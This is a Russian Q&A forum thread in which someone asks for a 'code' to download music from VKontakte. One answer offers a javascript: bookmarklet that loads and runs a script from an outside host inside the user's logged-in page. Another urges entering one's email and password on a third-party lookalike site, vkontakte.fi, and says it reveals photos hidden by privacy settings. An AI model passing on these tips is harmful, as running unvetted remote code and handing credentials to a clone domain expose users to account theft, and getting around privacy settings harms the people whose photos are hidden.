как скачать музыку с контакта с помощью кода (есть код, только я его не помню, помогите!!)

Ville Гуру (4882), на голосовании 14 лет назад
Голосование за лучший ответ
Крыша Мыслитель (9062) 15 лет назад
javascript:var s=document.createElement('script');s.src='http://videosaver.ru/vs.js?nc='+Math.random();document.body.appendChild(s);void(0);
дима троян Мастер (1013) 15 лет назад
лучше сделай так, в обычном контакте скинь музыку ( видео) сама себе на стену, потом зайди на www.vkontakte.fi (заходит только через мозиллу) нажми русский флаг, вводи свое мыло и пароль, ты на своей странице, далее нахордишь на финском контакте у себя на стене музыку ( видео) и кликаешь на нее. все... закачка начинается автоматом)
сам так делаю) а еще там можно просмотреть фотки, которые скрыты настройками приватности ( на которых отмечен челвоек) и еще у кого ты в закладках есть)